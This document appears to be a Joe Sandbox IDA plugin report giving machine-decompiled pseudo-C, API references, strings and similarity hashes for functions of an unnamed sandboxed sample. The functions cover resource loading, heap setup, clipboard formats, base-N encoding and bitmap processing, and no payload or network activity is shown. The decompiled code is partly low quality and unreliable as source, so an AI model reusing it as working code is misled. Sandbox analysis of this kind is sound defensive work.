					_t8 = LoadResource(_t24, _t15);
					_t21 = _t8;
					if(_t21 != 0) {
						_t9 = LockResource(_t21);
						_a8 = _t9;
						if(_t9 != 0) {
							_push(SizeofResource(_t24, _t15));
							_push(_a8);
							_t26 = L00D3798F(_t15, _v8, _t19, _t21, _t24, _t31);
						} else {
							_t26 = 0;
						}
						FreeResource(_t21);
						_t8 = _t26;
					}
				}
				return _t8;
			}

0x00d37919
0x00d37919
0x00d3791c
0x00d3791d
0x00d3791f
0x00d37922
0x00d37927
0x00d3792e
0x00d3792e
0x00d3793a
0x00d37940
0x00d37944
0x00d37949
0x00d3794f
0x00d37953
0x00d37956
0x00d3795c
0x00d37961
0x00d37972
0x00d37973
0x00d3797b
0x00d37963
0x00d37963
0x00d37963
0x00d3797e
0x00d37984
0x00d37984
0x00d37986
0x00d3798c

APIs

FindResourceW.KERNEL32(?,?,PNG,?,?,00EA53B8,?,00D386FD,?,?,?,00000038,00D375CE), ref: 00D3793A
LoadResource.KERNEL32(?,00000000,?,?,00EA53B8,?,00D386FD,?,?,?,00000038,00D375CE), ref: 00D37949
LockResource.KERNEL32(00000000,?,00EA53B8,?,00D386FD,?,?,?,00000038,00D375CE), ref: 00D37956
SizeofResource.KERNEL32(?,00000000,?,00EA53B8,?,00D386FD,?,?,?,00000038,00D375CE), ref: 00D37969
FreeResource.KERNEL32(00000000,?,00000000,?,00EA53B8,?,00D386FD,?,?,?,00000038,00D375CE), ref: 00D3797E

Strings

PNG, xrefs: 00D37931

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Resource$FindFreeLoadLockSizeof
String ID: PNG
API String ID: 4159136517-364855578
Opcode ID: e6476e6979d02d3ccff7634e6765c64caba67ce54422fac7cfc08b5bd2f7a002
Instruction ID: fb8ecc2316afccdeb0a88f4565720e1962ef540e2afefb69a8273006c5f97a0b
Opcode Fuzzy Hash: e6476e6979d02d3ccff7634e6765c64caba67ce54422fac7cfc08b5bd2f7a002
Instruction Fuzzy Hash: 9801F276504A25BF8B215B959C44DBEB76CEF49360B048225FC09A3311DB30CD008BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA2082 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CA2082() {
				signed int _t4;
				void* _t8;
				signed int _t9;

				_t4 =  *0xf0ab0c; // 0x3
				if((_t4 & 0x00000001) == 0) {
					 *0xf0ab0c = _t4 | 0x00000001;
					_t8 = GetProcessHeap();
					 *0xf0ab00 = 0xe92934;
					 *0xf0ab04 = _t8;
					 *0xf0ab08 = 0;
					0xe20d99(0xe8d6a1);
					_t4 =  *0xf0ab0c; // 0x3
				}
				if((_t4 & 0x00000002) == 0) {
					 *0xf0ab1c =  *0xf0ab1c & 0x00000000;
					 *0xf0ab20 =  *0xf0ab20 & 0x00000000;
					_t9 = 2;
					 *0xf0ab24 = _t9;
					 *0xf0ab0c = _t4 | _t9;
					 *0xf0ab10 = 0xe9294c;
					 *0xf0ab14 = 0xf0ab00;
					 *0xf0ab28 = 0;
					 *0xf0ab18 = 0xf0ab10;
					0xe20d99(0xe8d6ab);
				}
				return 0xf0ab10;
			}

0x00ca2082
0x00ca2089
0x00ca208e
0x00ca2093
0x00ca209e
0x00ca20a8
0x00ca20ad
0x00ca20b4
0x00ca20b9
0x00ca20be
0x00ca20c7
0x00ca20c9
0x00ca20d0
0x00ca20d9
0x00ca20dc
0x00ca20e4
0x00ca20ee
0x00ca20f8
0x00ca2102
0x00ca2108
0x00ca210e
0x00ca2113
0x00ca2117

APIs

GetProcessHeap.KERNEL32(00CA1029), ref: 00CA2093

Strings

L), xrefs: 00CA20C0

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: HeapProcess
String ID: L)
API String ID: 54951025-4062726202
Opcode ID: 8ec4a5377156da3847872248c51bee1d49d264e0c6f3e3d5814db7b191043c45
Instruction ID: c20e13849bc3d0088a104aaf4064f77e2a0aa9edfa6ecb335d495756b3bc3acf
Opcode Fuzzy Hash: 8ec4a5377156da3847872248c51bee1d49d264e0c6f3e3d5814db7b191043c45
Instruction Fuzzy Hash: 9A013CF1A153189FCB09EF58BD05B503BA2B3C5329F10801EE508962E1C3B40955FF47

Uniqueness

Uniqueness Score: -1.00%

Function 00E2EC83 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E30BEE,?,?,?,00000000), ref: 00E2EC88
UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00E2EC91

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 091deeb5602014a3cfcca98fb3f3920d04ca712b348dd73da148db12ea069bc1
Instruction ID: 4750fbd8c5b7aadc6fa811f000c6c8ef6830e3498d902e4c4538c7cacee2e74d
Opcode Fuzzy Hash: 091deeb5602014a3cfcca98fb3f3920d04ca712b348dd73da148db12ea069bc1
Instruction Fuzzy Hash: C1B09231044708BFEA002BA2EC09B883F68EB08A62F004020F61D562608B6358548B91

Uniqueness

Uniqueness Score: -1.00%

Function 00E3C223 Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000000,00000002,?,?,00E2BC1C,?,?,?,00000002,00000000,00000000,?), ref: 00E3C24A

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 767b46479d0bcf84f9c79f2278545ea8b2682146e9eb35c98a8074d722b84934
Instruction ID: dbe76023f2a9c697d1b9b263e7afd1c8584715526425b463bbdec79a034361dd
Opcode Fuzzy Hash: 767b46479d0bcf84f9c79f2278545ea8b2682146e9eb35c98a8074d722b84934
Instruction Fuzzy Hash: D4D0673604010EBF9F019FD5EC0ACAA3FADFB58314B549405F91C65121D672E520AB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD519 Relevance: 1.5, APIs: 1, Instructions: 17
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CAD519(void* __ecx, void** _a4) {
				void* _v12;

				NtQueryInformationFile( *_a4,  &_v12,  &(_a4[1]), 0x3f0, 9);
				return 0;
			}

0x00cad532
0x00cad53d

APIs

NtQueryInformationFile.NTDLL(?,?,?,000003F0,00000009), ref: 00CAD532

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: FileInformationQuery
String ID:
API String ID: 365787318-0
Opcode ID: 15de4edb04df175826757518f8a4bad6dc2feae5feb77e5160fe0811428dfbd6
Instruction ID: 8607fc26113ef147b366c7c90b5b0ca7f76dde37676262606f0e43bc41472295
Opcode Fuzzy Hash: 15de4edb04df175826757518f8a4bad6dc2feae5feb77e5160fe0811428dfbd6
Instruction Fuzzy Hash: C5D0A77615010C7FD304CB94DC05EA77BECEB09300F004169FA04CA051E672A91087E1

Uniqueness

Uniqueness Score: -1.00%

Function 00E22700 Relevance: .1, Instructions: 76COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 6d193eea36727f7b9389a052d42c9185110f393ac35b10f286352e682309e861
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 2C112BBB2081B2A3D6048A3DF8F86F6E395FBC532872C737FD2416B758D22299559600

Uniqueness

Uniqueness Score: -1.00%

Function 00E6199F Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec0c1c8ac6c2476833696fc1fcaae690ac1baf14c11221c00700ea6f1b48fa1f
Instruction ID: bd169eb7a1e363b83b14c00ddda5d7aa1c2278e1d83aeddac094b47269f02cda
Opcode Fuzzy Hash: ec0c1c8ac6c2476833696fc1fcaae690ac1baf14c11221c00700ea6f1b48fa1f
Instruction Fuzzy Hash: 4BF06D7154560AFFCB11CF24D1517A8B7E0BF84361F24E269E46DA7291C734DA80DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1C0F Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 46registryclipboardCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatW.USER32(Native), ref: 00E20BD5
RegisterClipboardFormatW.USER32(OwnerLink), ref: 00E20BDE
RegisterClipboardFormatW.USER32(ObjectLink), ref: 00E20BE8
RegisterClipboardFormatW.USER32(Embedded Object), ref: 00E20BF2
RegisterClipboardFormatW.USER32(Embed Source), ref: 00E20BFC
RegisterClipboardFormatW.USER32(Link Source), ref: 00E20C06
RegisterClipboardFormatW.USER32(Object Descriptor), ref: 00E20C10
RegisterClipboardFormatW.USER32(Link Source Descriptor), ref: 00E20C1A
RegisterClipboardFormatW.USER32(FileName), ref: 00E20C24
RegisterClipboardFormatW.USER32(FileNameW), ref: 00E20C2E
RegisterClipboardFormatW.USER32(Rich Text Format), ref: 00E20C38
RegisterClipboardFormatW.USER32(RichEdit Text and Objects), ref: 00E20C42

Strings

RichEdit Text and Objects, xrefs: 00E20C3A
Link Source Descriptor, xrefs: 00E20C12
Embed Source, xrefs: 00E20BF4
ObjectLink, xrefs: 00E20BE0
Native, xrefs: 00E20BCE
OwnerLink, xrefs: 00E20BD7
Link Source, xrefs: 00E20BFE
Rich Text Format, xrefs: 00E20C30
Object Descriptor, xrefs: 00E20C08
Embedded Object, xrefs: 00E20BEA
FileNameW, xrefs: 00E20C26
FileName, xrefs: 00E20C1C

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: e030a10dd0c2fc79c0a72f8a21ce050db23ff9003b9327468b3911f3f5bba5e3
Instruction ID: e467d9db2e5e70d0d5485b43d89848c267f76888fb359c8eacce7f830d17751d
Opcode Fuzzy Hash: e030a10dd0c2fc79c0a72f8a21ce050db23ff9003b9327468b3911f3f5bba5e3
Instruction Fuzzy Hash: 52014471E487297ECB109F779E0DD4A7EA0FE45760300696FA058A7640DBB6D852CFC0

Uniqueness

Uniqueness Score: -1.00%

Function 00E4DDD2 Relevance: 31.7, APIs: 5, Strings: 13, Instructions: 236COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00E4DDD9

Part of subcall function 00E4DBE9: __EH_prolog3_GS.LIBCMT ref: 00E4DBF3
Part of subcall function 00E4DBE9: __CxxThrowException@8.LIBCMT ref: 00E4DC74

Part of subcall function 00E4C6B1: __EH_prolog3_GS.LIBCMT ref: 00E4C6BB
Part of subcall function 00E4C6B1: __CxxThrowException@8.LIBCMT ref: 00E4C73C

__CxxThrowException@8.LIBCMT ref: 00E4DE93
__EH_prolog3_GS.LIBCMT ref: 00E4DEA0
__CxxThrowException@8.LIBCMT ref: 00E4DF7D
__EH_prolog3.LIBCMT ref: 00E4DF8A

Strings

BaseN_Decoder, xrefs: 00E4DDEC, 00E4DE03
EncodingLookupArray, xrefs: 00E4DEAE
BaseN_Encoder: Log2Base must be between 1 and 7 inclusive, xrefs: 00E4DF4E
BaseN_Encoder, xrefs: 00E4DEB3, 00E4DECA
Log2Base, xrefs: 00E4DDFE, 00E4DEC5
GroupSize, xrefs: 00E4DF9D
DecodingLookupArray, xrefs: 00E4DDE7
Grouper, xrefs: 00E4DFE1
PaddingByte, xrefs: 00E4DEE9
BaseN_Decoder: Log2Base must be between 1 and 7 inclusive, xrefs: 00E4DE64
Pad, xrefs: 00E4DEF9
Terminator, xrefs: 00E4E00D
Separator, xrefs: 00E4DFDC, 00E4DFF8

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Exception@8H_prolog3_Throw$H_prolog3
String ID: BaseN_Decoder$BaseN_Decoder: Log2Base must be between 1 and 7 inclusive$BaseN_Encoder$BaseN_Encoder: Log2Base must be between 1 and 7 inclusive$DecodingLookupArray$EncodingLookupArray$GroupSize$Grouper$Log2Base$Pad$PaddingByte$Separator$Terminator
API String ID: 2346160487-2095131268
Opcode ID: c8b650f05ac38a6482a94028e02a98eef203053c601367c58b70a9c7bb7bb2a2
Instruction ID: a5d300afa25b8161f28fff1d541e4bdb2313ac5711a3682547fb7c791d830bae
Opcode Fuzzy Hash: c8b650f05ac38a6482a94028e02a98eef203053c601367c58b70a9c7bb7bb2a2
Instruction Fuzzy Hash: D081D071A40205ABCF18EBA0DC52AEDB7F5FFA4315F14614DF5157B281DBB0AA09CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00D3705D Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 273
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00D3705D(intOrPtr __ecx, void* __edx, signed long long __fp0) {
				void* _t141;
				void* _t144;
				short _t150;
				void* _t155;
				void* _t156;
				intOrPtr _t159;
				void* _t164;
				void* _t174;
				void* _t182;
				unsigned int _t184;
				void* _t199;
				intOrPtr _t201;
				void* _t202;
				unsigned int _t204;
				signed int _t214;
				intOrPtr _t217;
				signed int _t231;
				signed int _t233;
				signed char* _t241;
				void* _t242;
				signed int _t244;
				void* _t245;
				signed long long* _t246;
				signed long long _t249;
				signed long long _t252;

				_t249 = __fp0;
				_t232 = __edx;
				0xe21503(0x104);
				_t201 = __ecx;
				 *((intOrPtr*)(_t245 - 0xc8)) = __ecx;
				 *((intOrPtr*)(__ecx + 0xc)) =  *((intOrPtr*)(_t245 + 8));
				 *((intOrPtr*)(__ecx + 0x30)) = 1;
				if( *((intOrPtr*)(__ecx + 0x8c)) != 0) {
					if( *((intOrPtr*)(E00D20FF2() + 0x1ac)) > 8) {
						E00D19EF3(_t245 - 0xc4);
						 *(_t245 - 4) =  *(_t245 - 4) & 0x00000000;
						E00D1A8A4(_t201, _t245 - 0xc4, __edx,  *0xe8e168(0));
						if(GetObjectW( *(_t201 + 0x8c), 0x18, _t245 - 0x110) == 0) {
							L30:
							_t202 = 0;
						} else {
							 *(_t245 - 0xb0) =  *(_t245 - 0x10c);
							 *(_t245 - 0x94) =  *(_t245 - 0x108);
							_t144 =  *(_t201 + 0x8c);
							if(_t144 == 0) {
								_t242 = 0;
								 *(_t245 - 0x98) = 0;
							} else {
								_t199 = SelectObject( *(_t245 - 0xc0), _t144);
								_t242 = _t199;
								 *(_t245 - 0x98) = _t199;
							}
							if(_t242 == 0) {
								goto L30;
							} else {
								E00D19EF3(_t245 - 0xd8);
								 *(_t245 - 4) = 1;
								E00D1A8A4(_t201, _t245 - 0xd8, _t232,  *0xe8e168( *(_t245 - 0xc0)));
								_t233 =  *(_t245 - 0x94);
								_t214 =  *(_t245 - 0xb0);
								 *(_t245 - 0x2c) =  *(_t245 - 0x2c) & 0x00000000;
								 *((short*)(_t245 - 0x30)) = 1;
								_t150 = 0x20;
								 *((short*)(_t245 - 0x2e)) = _t150;
								 *(_t245 - 0x38) = _t214;
								 *((intOrPtr*)(_t245 - 0x3c)) = 0x28;
								 *(_t245 - 0x28) = _t233 * _t214;
								 *(_t245 - 0x34) = _t233;
								 *((intOrPtr*)(_t245 - 0x24)) = 0;
								 *((intOrPtr*)(_t245 - 0x20)) = 0;
								 *((intOrPtr*)(_t245 - 0x1c)) = 0;
								 *((intOrPtr*)(_t245 - 0x18)) = 0;
								 *((intOrPtr*)(_t245 - 0xe0)) = 0;
								_t155 =  *0xe8e0fc( *(_t245 - 0xd4), _t245 - 0x3c, 0, _t245 - 0xe0, 0, 0);
								 *(_t245 - 0x9c) = _t155;
								if(_t155 != 0) {
									_t156 = SelectObject( *(_t245 - 0xd4), _t155);
									 *(_t245 - 0xdc) = _t156;
									if(_t156 != 0) {
										 *0xe8e16c( *(_t245 - 0xd4), 0, 0,  *(_t245 - 0xb0),  *(_t245 - 0x94),  *(_t245 - 0xc0), 0, 0, 0xcc0020);
										_t159 =  *((intOrPtr*)(_t201 + 0xc));
										 *((intOrPtr*)(_t245 - 0xa0)) = _t159;
										if(_t159 <= 0) {
											_t159 = 0x82;
											 *((intOrPtr*)(_t245 - 0xa0)) = 0x82;
										}
										 *((intOrPtr*)(_t245 - 0xa8)) = _t159;
										if( *((intOrPtr*)(_t201 + 8)) != 0x20) {
											E00D41EEE(_t245 - 0xac, _t245 - 0xd8);
											_t217 =  *((intOrPtr*)(_t201 + 0xa8));
											 *(_t245 - 4) = 2;
											if(_t217 == 0xffffffff) {
												_t217 =  *((intOrPtr*)(E00D20FF2() + 0x1c));
											}
											 *(_t245 - 0xf0) =  *(_t245 - 0xf0) & 0x00000000;
											 *(_t245 - 0xec) =  *(_t245 - 0xec) & 0x00000000;
											_push(0xffffffff);
											_push(_t217);
											_push( *((intOrPtr*)(_t245 - 0xa0)));
											 *(_t245 - 0xe8) =  *(_t245 - 0xb0);
											 *(_t245 - 0xe4) =  *(_t245 - 0x94);
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											_t164 = L00D44708(_t245 - 0xac, _t233, _t249);
											 *(_t245 - 4) = 1;
											E00D41F03(_t164, _t245 - 0xac);
											goto L27;
										} else {
											if(GetObjectW( *(_t245 - 0x9c), 0x54, _t245 - 0x90) == 0) {
												goto L11;
											} else {
												_t174 = 0x20;
												if( *((intOrPtr*)(_t245 - 0x7e)) != _t174 ||  *((intOrPtr*)(_t245 - 0x7c)) == 0) {
													goto L11;
												} else {
													 *(_t245 - 0x94) =  *(_t245 - 0x94) & 0x00000000;
													if( *(_t245 - 0x88) *  *(_t245 - 0x8c) > 0) {
														asm("fild dword [ebp-0xa8]");
														 *(_t245 - 0xa4) = _t249;
														_t251 =  *(_t245 - 0xa4) *  *0xea5418;
														_t241 =  *((intOrPtr*)(_t245 - 0x7c)) + 1;
														 *(_t245 - 0xa4) =  *(_t245 - 0xa4) *  *0xea5418;
														do {
															_t182 = L00D45A47((( *(_t241 - 1) & 0x000000ff) << 0x00000008 |  *_t241 & 0x000000ff) << 0x00000008 | _t241[1] & 0x000000ff, _t251, (( *(_t241 - 1) & 0x000000ff) << 0x00000008 |  *_t241 & 0x000000ff) << 0x00000008 | _t241[1] & 0x000000ff, _t245 - 0xf8, _t245 - 0xe8, _t245 - 0xb4);
															_t252 =  *(_t245 - 0xa4);
															_t246 = _t246 - 0x30;
															asm("fst qword [esp+0x28]");
															asm("fst qword [esp+0x20]");
															_t246[3] = _t252;
															asm("fldz");
															_t246[2] = _t252;
															_t246[1] =  *(_t245 - 0xb4);
															_t251 =  *(_t245 - 0xf8);
															 *_t246 =  *(_t245 - 0xf8);
															_push(E00D44A1F(_t182));
															_t184 = E00D45749((( *(_t241 - 1) & 0x000000ff) << 0x00000008 |  *_t241 & 0x000000ff) << 0x00000008 | _t241[1] & 0x000000ff);
															_t244 = _t241[2] & 0x000000ff;
															_t204 = _t184;
															asm("cdq");
															_t241[1] = (_t204 & 0x000000ff) * _t244 / 0xff;
															asm("cdq");
															 *_t241 = (_t204 >> 0x00000008 & 0x000000ff) * _t244 / 0xff;
															_t241 =  &(_t241[4]);
															asm("cdq");
															 *((char*)(_t241 - 5)) = (_t204 >> 0x00000010 & 0x000000ff) * _t244 / 0xff;
															_t231 =  *(_t245 - 0x94) + 1;
															 *(_t245 - 0x94) = _t231;
														} while (_t231 <  *(_t245 - 0x88) *  *(_t245 - 0x8c));
														_t201 =  *((intOrPtr*)(_t245 - 0xc8));
														L27:
														_t242 =  *(_t245 - 0x98);
													}
													SelectObject( *(_t245 - 0xd4),  *(_t245 - 0xdc));
													SelectObject( *(_t245 - 0xc0), _t242);
													DeleteObject( *(_t201 + 0x8c));
													 *(_t201 + 0x8c) =  *(_t245 - 0x9c);
													_t202 = 1;
												}
											}
										}
									} else {
										SelectObject( *(_t245 - 0xc0), _t242);
										DeleteObject( *(_t245 - 0x9c));
										goto L11;
									}
								} else {
									SelectObject( *(_t245 - 0xc0), _t242);
									L11:
									_t202 = 0;
								}
								 *(_t245 - 4) = 0;
								E00D1A049(_t245 - 0xd8);
							}
						}
						 *(_t245 - 4) =  *(_t245 - 4) | 0xffffffff;
						E00D1A049(_t245 - 0xc4);
						_t141 = _t202;
					} else {
						_t141 = 1;
					}
				} else {
					_t141 = 1;
				}
				0xe214b2();
				return _t141;
			}

0x00d3705d
0x00d3705d
0x00d37067
0x00d3706c
0x00d3706e
0x00d3707a
0x00d37084
0x00d37087
0x00d3709c
0x00d370ac
0x00d370b1
0x00d370c4
0x00d370e0
0x00d37464
0x00d37464
0x00d370e6
0x00d370f2
0x00d370fe
0x00d37104
0x00d3710c
0x00d37121
0x00d37123
0x00d3710e
0x00d37115
0x00d37117
0x00d37119
0x00d37119
0x00d3712b
0x00000000
0x00d37131
0x00d37137
0x00d37142
0x00d37153
0x00d37158
0x00d37160
0x00d37167
0x00d3716d
0x00d37171
0x00d37172
0x00d3717b
0x00d37182
0x00d37189
0x00d37197
0x00d371a1
0x00d371a4
0x00d371a7
0x00d371aa
0x00d371ad
0x00d371b3
0x00d371b9
0x00d371c1
0x00d371da
0x00d371dc
0x00d371e4
0x00d37220
0x00d37226
0x00d37229
0x00d37231
0x00d37233
0x00d37238
0x00d37238
0x00d37242
0x00d37248
0x00d373a1
0x00d373a6
0x00d373ac
0x00d373b3
0x00d373ba
0x00d373ba
0x00d373c9
0x00d373d0
0x00d373d7
0x00d373d9
0x00d373da
0x00d373e0
0x00d373f7
0x00d373fd
0x00d373fe
0x00d373ff
0x00d37400
0x00d37401
0x00d3740c
0x00d37410
0x00000000
0x00d3724e
0x00d37265
0x00000000
0x00d3726b
0x00d3726d
0x00d37272
0x00000000
0x00d37282
0x00d3728f
0x00d37298
0x00d3729e
0x00d372a4
0x00d372b0
0x00d372b9
0x00d372ba
0x00d372c0
0x00d372eb
0x00d372f0
0x00d372f6
0x00d372f9
0x00d372fd
0x00d37301
0x00d37305
0x00d37307
0x00d37311
0x00d37315
